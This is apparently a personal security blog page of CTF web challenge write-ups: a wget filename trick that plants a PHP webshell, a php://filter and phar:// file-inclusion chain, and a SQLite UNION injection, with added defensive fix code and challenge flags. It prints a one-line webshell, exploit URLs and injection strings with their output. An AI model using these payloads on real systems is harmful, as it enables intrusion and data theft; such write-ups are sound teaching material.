shpik's world!

[Web] trendyweb - 100pts

0x400 CTF/0x402 Secuinside 2016

Here is the information given for this challenge.


The goal is to read the flag located in / (root).


The challenge provides the source; let's analyze it.

(https://gist.github.com/Jinmo/e49dfef9b7325acb12566de3a7f88859)


<?php
error_reporting(E_ALL);
ini_set('display_errors', 'On');
ini_set('allow_url_fopen', 'On'); // yo!
$session_path = '';
// Unserialized from the per-session pickle file below; __wakeup runs a command taken from $_GET
class MyClass {
    function __wakeup() {
        system($_GET['cmd']); // come onn!
    }
}
function onShutdown() {
    global $session_path;
    file_put_contents($session_path . '/pickle', serialize($_SESSION));
}
session_start();
register_shutdown_function('onShutdown');
function set_context($id) {
    global $_SESSION, $session_path;
    $session_path = getcwd() . '/data/' . $id;   // web-accessible per-session directory
    if (!is_dir($session_path)) mkdir($session_path);
    chdir($session_path);
    if (!is_file('pickle')) $_SESSION = array();
    else $_SESSION = unserialize(file_get_contents('pickle'));
}
function download_image($url) {
    $url = parse_url($origUrl = $url);
    // Only the scheme and the parsed path are checked; the query string is not
    if (isset($url['scheme']) && $url['scheme'] == 'http')
        if ($url['path'] == '/avatar.png') {
            // wget names the saved file after the URL, inside the session directory
            system('/usr/bin/wget ' . escapeshellarg($origUrl));
        }
}
if (!isset($_SESSION['id'])) {
    $sessId = bin2hex(openssl_random_pseudo_bytes(10));
    $_SESSION['id'] = $sessId;
} else {
    $sessId = $_SESSION['id'];
}
session_write_close();
set_context($sessId);
if (isset($_POST['image'])) download_image($_POST['image']);
?>

<img src="/data/<?php echo $sessId; ?>/avatar.png" width=80 height=80 />

ini_set('allow_url_fopen', 'On');

Since allow_url_fopen is turned On, I expected an LFI or RFI vulnerability.


First, on visiting the site, a broken image is shown on the page.

http://chal.cykor.kr:8082/data/f1aee8633e39c4445404/avatar.png

Going up to the parent directory, directory listing is enabled.

http://chal.cykor.kr:8082/data/f1aee8633e39c4445404/


The file present there is pickle.

The contents of pickle are of no use.


Going back to the source, images are downloaded via download_image: the image value is passed as a POST parameter, and when the path component of parse_url applied to that value is /avatar.png, the image file is downloaded with the wget command.


For the URL "http://0.0.0.0/avatar.png?n=shpik", the path component from parse_url is /avatar.png, so appending .php after the ? bypasses the parse_url check; using this, the following webshell was uploaded.


<?php system($_GET['c']);?>

This revealed that a file named `flag_is_heeeeeeeereeeeeee` exists in / (root).


http://chal.cykor.kr:8082/data/f1aee8633e39c4445404/avatar.png%3f3.php?c=/flag_is_heeeeeeeereeeeeee


flag is

1-day is not trendy enough  ]
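A stricter download_image(), as an added example that is not part of the challenge source: the URL rule rejects what the original path check let through, and the server chooses the destination name instead of wget. The host example.test and the fixed file name are assumptions.

```php
<?php
// Added example (not the challenge's code): a stricter replacement for
// download_image(). The original only checks that the parsed path is
// /avatar.png, so "http://host/avatar.png?3.php" passes, and wget names the
// saved file after the URL, leaving a ".php" file inside the web root.
function avatar_url_error(string $origUrl): ?string {
    $url = parse_url($origUrl);
    if ($url === false)                                   return 'unparseable URL';
    if (($url['scheme'] ?? '') !== 'http')               return 'scheme must be http';
    if (($url['path'] ?? '') !== '/avatar.png')          return 'path must be /avatar.png';
    // The original stops at the path; the query string is where the ".php" travelled.
    if (isset($url['query']) || isset($url['fragment'])) return 'query/fragment not allowed';
    if (isset($url['user']) || isset($url['pass']))      return 'userinfo not allowed';
    return null;
}

// The server chooses the destination name, so nothing from the URL reaches the
// filesystem, and the content is verified as a PNG or deleted. Serving data/
// with PHP execution disabled is the other half of the fix.
function download_avatar(string $origUrl, string $dir): bool {
    if (avatar_url_error($origUrl) !== null) return false;
    $dest = $dir . '/avatar.png';
    system('/usr/bin/wget -q -O ' . escapeshellarg($dest) . ' -- ' . escapeshellarg($origUrl), $rc);
    $info = @getimagesize($dest);
    if ($rc !== 0 || $info === false || $info[2] !== IMAGETYPE_PNG) {
        @unlink($dest);
        return false;
    }
    return true;
}

// Self-check of the URL rule alone (no network); example.test is a constructed host.
$cases = [
    'http://example.test/avatar.png'        => null,
    'http://example.test/avatar.png?3.php'  => 'query/fragment not allowed',
    'http://example.test/avatar.png#x.php'  => 'query/fragment not allowed',
    'http://example.test/other.png'         => 'path must be /avatar.png',
    'ftp://example.test/avatar.png'         => 'scheme must be http',
];
foreach ($cases as $u => $want) {
    if (avatar_url_error($u) !== $want) throw new RuntimeException("unexpected verdict for $u");
}
echo "checks passed\n";
```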


[Web] Mortal Magi Agents - 300pts

0x400 CTF/0x401 MMA 1st 2015


Problem

http://magiagents.chal.mmactf.link/

Flag

#   Your Score   Score   Teams
1   300          300     77


This problem has an LFI vulnerability.


Problem Page [ http://magiagents.chal.mmactf.link/ ]



'index.php?page=settings' is the vulnerable point.

The file upload is on the settings page.


First I obtained the PHP source.


http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home

// home.php


// index.php
<?php
session_start();

if (!isset($_GET["page"]) || isset($page))
    $page = "home";
else
    $page = $_GET["page"];
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.ico">

    <title>Mortal Magi Agents</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/jumbotron.css" rel="stylesheet">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>

  <body>

    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
        </div>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="?page=home">Home</a></li>
            <li><a href="?page=news">News</a></li>
            <li><a href="#contact">Contact</a></li>
          </ul>
<?php if (isset($_SESSION["user"])) { ?>
          <ul class="nav navbar-nav navbar-right">
            <li class='dropdown'>
              <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
              <?php
              if (isset($_SESSION["avator"])) {
                  echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">';
              }
              echo $_SESSION["user"];
              ?><span class='caret'></span></a>
              <ul class='dropdown-menu' role='menu'>
              <li><a href="?page=settings">Settings</a></li>
              <li><a href="logout.php">Sign out</a></li>
              </ul>
            </li>
          </ul>
<?php } else { ?>
          <form class="navbar-form navbar-right" action="login.php" method="post">
            <div class="form-group">
              <input type="text" placeholder="User" class="form-control" name="user">
            </div>
            <div class="form-group">
              <input type="password" placeholder="Password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-success" name="signin">Sign in</button>
            <button type="submit" class="btn btn-danger" name="signup">Sign up</button>
          </form>
<?php } ?>
        </div><!--/.nav-collapse -->
      </div>
    </nav>

    <!-- Main jumbotron for a primary marketing message or call to action -->
    <!--
    <div class="jumbotron">
    </div>
    -->
    <div class="container">
<?php
include("$page.php");
?>
      </div>


      <hr>

      <footer>
        <p>Mortal Magi Agents 2015</p>
      </footer>
    </div> <!-- /container -->


    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
  </body>
</html>


// settings.php
<?php
require "./db.php";
if (isset($_FILES["file"])) {
    if ($_FILES['file']['type'] == "image/jpeg") {
        $ext = ".jpg";
    }
    else if ($_FILES['file']['type'] == "image/gif") {
        $ext = ".gif";
    }
    else if ($_FILES['file']['type'] == "image/png") {
        $ext = ".png";
    }
    $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    
    $_SESSION["avator"] = $filename;
    $db = connect_db();
    $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
}
?>
<div class="page-header"><h1>Settings</h1></div>
<h2>Avator</h2>
<?php
if (isset($_SESSION["avator"])) {
?>
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<?php
}
?>
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>



The uploaded file name is 'user' + sha1(filename).

But this name poses no problem.


I used phar://.


getflag.php

<?php echo file_get_contents('../flag');?>


http://magiagents.chal.mmactf.link/?page=phar:///var/www/html/avators/afafafb347d0cf8bd02e7ddd7c018e74fa336beff2b0b5.jpg/getflag


MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}


Good

Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
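The two weaknesses this writeup chains, the unrestricted include and the client-chosen upload type, each beside a stricter form, as an added example that is not the challenge's code. The page names and image types are the challenge's own; the 1x1 GIF used in the self-check is constructed.

```php
<?php
// Added example (not the challenge's code): the two weaknesses this writeup chains,
// each beside a stricter form. Page names and image types are the challenge's own;
// the sample GIF below is constructed.

// 1. index.php does include("$page.php") with $page taken straight from $_GET, so
//    "php://filter/..." and "phar://..." are accepted as page names. An allowlist
//    removes the LFI; anything not listed falls back to the default page.
const PAGES = ['home', 'news', 'settings'];
function resolve_page(?string $requested): string {
    return in_array($requested, PAGES, true) ? $requested : 'home';
}

// 2. settings.php picks the extension from $_FILES['file']['type'], which the client
//    writes, so any file can be stored as ".jpg". Derive the type from the bytes,
//    accept only the three image types, and reject phar stubs: phar archives are
//    recognised by the __HALT_COMPILER(); token, and a stub may begin with a valid
//    image header. Where phar is not needed at all, stream_wrapper_unregister('phar')
//    at bootstrap removes the wrapper entirely.
function safe_upload_ext(string $path): ?string {
    $info = @getimagesize($path);
    if ($info === false) return null;
    $map = [IMAGETYPE_JPEG => '.jpg', IMAGETYPE_GIF => '.gif', IMAGETYPE_PNG => '.png'];
    if (!isset($map[$info[2]])) return null;
    if (stripos((string) file_get_contents($path), '__HALT_COMPILER') !== false) return null;
    return $map[$info[2]];
}

// Self-check with the writeup's own page values and a constructed 1x1 GIF.
$pages = [
    'home' => 'home', 'news' => 'news', '' => 'home',
    'php://filter/convert.base64-encode/resource=home' => 'home',
    'phar:///var/www/html/avators/x.jpg/getflag' => 'home',
];
foreach ($pages as $in => $want) {
    if (resolve_page($in) !== $want) throw new RuntimeException("resolve_page($in)");
}
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAAIBAEAOw==');
$plain = tempnam(sys_get_temp_dir(), 'up');
$polyglot = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($plain, $gif);
file_put_contents($polyglot, $gif . '<?php __HALT_COMPILER(); ?>');
if (safe_upload_ext($plain) !== '.gif') throw new RuntimeException('gif rejected');
if (safe_upload_ext($polyglot) !== null) throw new RuntimeException('phar stub accepted');
unlink($plain); unlink($polyglot);
echo "checks passed\n";
```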



[Web] Login as admin! - 30pts

0x400 CTF/0x401 MMA 1st 2015


Problem

Login as admin. And get the flag! The flag is the password of admin.

http://arrive.chal.mmactf.link/login.cgi

You can use test:test.

Flag

#   Your Score   Score   Teams
1   30           30      318


Problem Page [ http://arrive.chal.mmactf.link/login.cgi ]



This problem is SQL injection, and the database is SQLite.


Let's exploit!


First I sent a simple query:


POST DATA : username=admin' --&password=1

Congratulations!!
You are admin user.
The flag is your password!

logout


Oh... the flag is admin's password.


Therefore I looked for the table name.


POST DATA : username=admin' union select name, NULL from sqlite_master--&password=1

You are user user.

logout

Table name is 'user'.


So I injected the username with a UNION query:


POST DATA : username=admin' union select password,NULL from user limit 0,1--&password=1


You are MMA{cats_alice_band} user.

logout


Good!

Flag is MMA{cats_alice_band}


Actually, this problem has no filtering.

So you could also have used blind SQL injection.




Author : shpik (http://shpik.tistory.com)


[Prob13] Network Recovery! - Network 150

0x300 wargame/0x303 xcz.kr

Title

Network Recovery!

Description
Key Format = lowercase(md5("Key"))

Download Here 





[Prob32] Easy Trick - Web 100

0x300 wargame/0x303 xcz.kr

Title

Easy Trick


Description

Korean

Find the key using a PHP trick.


English

Find The key with PHP trick


Prob Page

Source Page 





[Prob21] PHP Obfuscation Crack - Web 300

0x300 wargame/0x303 xcz.kr


Title
PHP Obfuscation Crack

Description
View source

Wrong T.T


View Source

 
<?php
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67\x61\x73y\x61\x72\x6b\x6e\x64"]="\x62";${"\x47\x4c\x4f\x42AL\x53"}["r\x77\x6cii\x69\x71\x66\x76\x66\x70"]="i";function h($a){${"\x47\x4cO\x42\x41L\x53"}["\x70x\x7a\x77\x65\x61h\x72\x75\x71\x6f\x6b"]="\x62";${${"\x47LO\x42\x41\x4c\x53"}["\x70\x78z\x77\x65\x61\x68\x72u\x71\x6f\x6b"]}="";${"GL\x4fB\x41\x4c\x53"}["u\x78\x6fi\x69i\x6b\x61pcv"]="\x62";for(${${"\x47\x4c\x4f\x42A\x4c\x53"}["r\x77\x6c\x69\x69i\x71\x66\x76fp"]}=0;${${"\x47\x4c\x4f\x42A\x4cS"}["\x72\x77l\x69i\x69\x71\x66\x76\x66\x70"]}<5;${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x72\x77\x6ci\x69\x69qf\x76\x66\x70"]}++){$ydzorvqk="\x61";$gflrozo="\x62";${"\x47\x4cOB\x41\x4cS"}["\x65\x72p\x78\x7a\x6fz\x64\x65y"]="i";${$gflrozo}=${${"G\x4c\x4f\x42AL\x53"}["\x67\x61sy\x61\x72k\x6e\x64"]}+ord(substr(${$ydzorvqk},${${"\x47\x4c\x4f\x42ALS"}["\x65rp\x78\x7a\x6fz\x64e\x79"]},1));}return${${"\x47\x4c\x4fBA\x4cS"}["\x75x\x6fi\x69i\x6b\x61\x70\x63v"]};}$jbojdbertutk="\x4b\x45\x59";$vtefigaylx="mu\x6e";${"G\x4cOB\x41L\x53"}["\x68p\x63eeyx\x74o"]="\x61";$ktjmdjm="a";${"\x47\x4c\x4f\x42ALS"}["\x6d\x69mt\x65\x6du\x63\x79\x62\x70c"]="\x6d\x75\x6e";${$jbojdbertutk}="\x43o\x6e\x67\x72a\x74\x75\x6ca\x74\x69\x6f\x6es\x21</\x62r\x3e\x4be\x79\x20i\x73 
?????????????????????";${"GL\x4f\x42\x41\x4cS"}["\x67\x6d\x66i\x66\x62f\x6c"]="\x61";${${"G\x4c\x4f\x42AL\x53"}["\x6d\x69\x6d\x74em\x75c\x79\x62p\x63"]}=@$_GET["\x6b\x65y"];${"GL\x4f\x42A\x4c\x53"}["w\x76d\x63\x78\x73\x64\x73\x71b"]="x";@${$ktjmdjm}=explode("-",${$vtefigaylx});$gfxqkfxurga="\x78";$dlmordkk="\x61";for(${${"\x47\x4c\x4fBA\x4cS"}["w\x76\x64\x63\x78\x73\x64\x73\x71b"]}=0;${${"\x47\x4c\x4f\x42\x41LS"}["\x77v\x64\x63\x78s\x64\x73\x71\x62"]}<5;${$gfxqkfxurga}++){if(preg_match("/[^a-\x7a\x41-\x5a\x30-\x39]/",@${${"\x47\x4cOB\x41\x4c\x53"}["\x68pc\x65e\x79\x78\x74\x6f"]}[${${"\x47\x4cO\x42A\x4c\x53"}["\x77vd\x63\x78\x73ds\x71\x62"]}])){exit("\x45rr\x6f\x72!");}}if(is_numeric(substr(${${"\x47LO\x42\x41\x4c\x53"}["\x68p\x63e\x65y\x78to"]}[0],0,2))&&!is_numeric(substr(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x68\x70\x63ee\x79\x78t\x6f"]}[0],4,1))&&h(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["gm\x66\x69fbfl"]}[0])>312&&h(${${"\x47L\x4f\x42A\x4cS"}["h\x70\x63e\x65yx\x74\x6f"]}[0])<333&&!is_numeric(substr(${$dlmordkk}[1],0,1))&&is_numeric(substr(${${"\x47\x4c\x4fB\x41LS"}["hpc\x65ey\x78to"]}[1],3,2))){$qcpkjlbgy="\x61";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x71\x6f\x74\x6a\x62\x76\x6e"]="\x61";${"G\x4cO\x42ALS"}["bb\x67h\x7a\x6f\x74"]="\x61";if(h(${${"\x47\x4c\x4f\x42\x41LS"}["b\x62g\x68z\x6ft"]}[1])>300&&h(${$qcpkjlbgy}[1])<326&&!is_numeric(substr(${${"GL\x4f\x42\x41\x4c\x53"}["hp\x63\x65\x65yx\x74o"]}[2],0,1))&&is_numeric(substr(${${"\x47LO\x42AL\x53"}["\x68\x70c\x65e\x79xt\x6f"]}[2],1,1))&&h(${${"GLO\x42\x41L\x53"}["o\x71o\x74\x6a\x62\x76n"]}[2])>349&&h(${${"\x47\x4c\x4fB\x41\x4cS"}["h\x70c\x65\x65\x79x\x74o"]}[2])<407){${"\x47L\x4fBA\x4cS"}["\x77\x73ju\x78\x77\x78bz\x6d\x73"]="\x61";${"\x47\x4cOB\x41\x4c\x53"}["o\x66\x76\x6d\x69\x61\x74\x63\x64ko"]="a";$oqhejquzit="a";if(!is_numeric(substr(${${"G\x4c\x4fBA\x4cS"}["\x77\x73\x6au\x78\x77\x78bz\x6d\x73"]}[3],0,2))&&is_numeric(substr(${$oqhejquzit}[3],2,3))&&h(${${"GL\x4f\x42\x41\x4c\x53"}["o\x66\x76\x6di\x61\x74\x63\x64\x6b\x6f"]}[3])>357&&h(${${"\x47\x4c\x4fBA\x4cS"}["hp\x63\x65ey\x78\x74\x6f"]}[3])<359){${"G\x4c\x4f\x42\x41L\x53"}["\x65rq\x71jp\x63t"]="\x61";${"G\x4c\x4fBAL\x53"}["ok\x67\x6f\x6e\x64\x66\x69\x64\x6b\x79"]="\x61";if(round((h(${${"G\x4c\x4f\x42A\x4c\x53"}["\x68\x70c\x65\x65y\x78t\x6f"]}[0])+h(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6fkg\x6f\x6ed\x66\x69\x64\x6b\x79"]}[1])+h(${${"\x47\x4c\x4f\x42AL\x53"}["h\x70c\x65e\x79\x78\x74\x6f"]}[2])+h(${${"\x47L\x4f\x42A\x4cS"}["h\x70\x63e\x65\x79\x78\x74o"]}[3]))/4)==h(${${"\x47L\x4f\x42ALS"}["\x65\x72\x71\x71\x6a\x70ct"]}[4])){$oaqqkxn="\x4b\x45\x59";exit(${$oaqqkxn});}}}}echo"\x57\x72ong\x20\x54.T";
?>






[Rookies] echo1 - 25pt

This post is protected.
Enter the password to view its contents.

All Clear

0x300 wargame/0x301 webhacking.kr



Uncategorized


Hello, this is shpik.


This blog consists of security, hacking, games and daily life; apart from games and daily life, most of it is private.


If you would like to see the contents, please ask me separately on the guestbook.




Hello !


This blog is composed of Computer Security & Hacking & Game & Life.








Online

- League of Legend

- Maple Story 2

Steam

- Borderland 2

- The binding of Isaac:Rebirth

Mobile

- Seven knights


[Toddler's Bottle] mistake

This post is protected.
Enter the password to view its contents.